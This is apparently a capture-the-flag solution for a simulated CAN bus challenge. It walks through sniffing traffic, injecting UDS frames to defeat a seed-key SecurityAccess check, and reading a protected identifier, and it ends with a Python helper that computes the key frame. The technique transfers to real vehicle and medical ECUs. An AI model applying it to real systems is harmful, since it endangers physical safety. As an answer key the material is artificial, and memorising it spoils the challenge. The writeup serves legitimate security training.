# CAN Bus Implant — Solution

## Overview

Simulated CAN bus with background traffic and UDS (Unified Diagnostic Services) protocol. Player sniffs traffic to identify patterns, then injects UDS frames to gain security access and read a protected DID.

## Steps

1. Open two terminals — one for sniffing, one for injection:

   ```bash
   # Terminal 1: Sniff
   nc 3600
   # Terminal 2: Inject
   nc 3601
   ```

2. Observe traffic on the sniff port. Note the following patterns:
   - `0x100`: Heartbeat (periodic counter)
   - `0x200-0x203`: Sensor data (temperature, heart rate)
   - `0x7DF`: OBD broadcast diagnostic request
   - `0x7E0` → `0x7E8`: UDS request/response pair (periodic VIN read)

3. On the inject port, enter extended diagnostic session:

   ```
   send 7E0 02 10 03 00 00 00 00 00
   ```

   Response on sniff shows `0x7E8` with positive response `50 03`.

4. Request a security seed:

   ```
   send 7E0 02 27 01 00 00 00 00 00
   ```

   Response contains 4-byte seed: `67 01 XX XX XX XX`.

5. Compute the key by XORing each seed byte with `0x42`, then send:

   ```
   send 7E0 06 27 02 KK KK KK KK 00
   ```

   Positive response: `67 02`.

6. Read the flag from DID 0xFF01:

   ```
   send 7E0 03 22 FF 01 00 00 00 00
   ```

   Response contains the flag.

## Key Concepts

- **CAN bus**: Controller Area Network — no authentication, broadcast medium, used in vehicles and medical equipment
- **UDS (ISO 14229)**: Diagnostic protocol with services like DiagnosticSessionControl, SecurityAccess, ReadDataByIdentifier
- **SecurityAccess**: Challenge-response authentication — ECU sends seed, tester must compute correct key
- **Traffic analysis**: Identifying request/response patterns and protocol types from raw bus traffic
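
Steps 4 and 5 of the walkthrough (seed response in, key command out) as an added Python example; this is not part of the original solution or the challenge's own code. It assumes the sniff port shows all 8 data bytes, including the leading ISO-TP single-frame length byte, and the seed value used is constructed.

```python
# Added example. Sample frames below are constructed, not captured output.
XOR_CONST = 0x42  # per-byte XOR constant given in step 5


def parse_single_frame(data_hex: str) -> bytes:
    """Return the UDS payload of an 8-byte ISO-TP single frame."""
    raw = bytes.fromhex(data_hex)  # whitespace between bytes is ignored
    if len(raw) != 8:
        raise ValueError("expected 8 data bytes")
    if raw[0] >> 4 != 0:
        raise ValueError("not a single frame (multi-frame not handled)")
    length = raw[0] & 0x0F  # low nibble = number of payload bytes
    if not 1 <= length <= 7:
        raise ValueError("invalid single-frame length")
    return raw[1:1 + length]


def extract_seed(response_hex: str) -> bytes:
    """Pull the 4-byte seed out of a 67 01 positive response."""
    payload = parse_single_frame(response_hex)
    if payload[0] == 0x7F:  # negative response: 7F <service> <NRC>
        raise ValueError(f"negative response, NRC 0x{payload[-1]:02X}")
    if len(payload) != 6 or payload[:2] != b"\x67\x01":
        raise ValueError("not a SecurityAccess seed response")
    return payload[2:]


def build_key_command(seed: bytes) -> str:
    """XOR each seed byte with 0x42 and format the step 5 inject line."""
    key = bytes(b ^ XOR_CONST for b in seed)
    payload = b"\x27\x02" + key
    # Prefix the payload length, then pad the frame to 8 bytes with 00.
    frame = (bytes([len(payload)]) + payload).ljust(8, b"\x00")
    return "send 7E0 " + frame.hex(" ").upper()


if __name__ == "__main__":
    seed = extract_seed("06 67 01 11 22 33 44 00")  # constructed seed
    print(build_key_command(seed))
```
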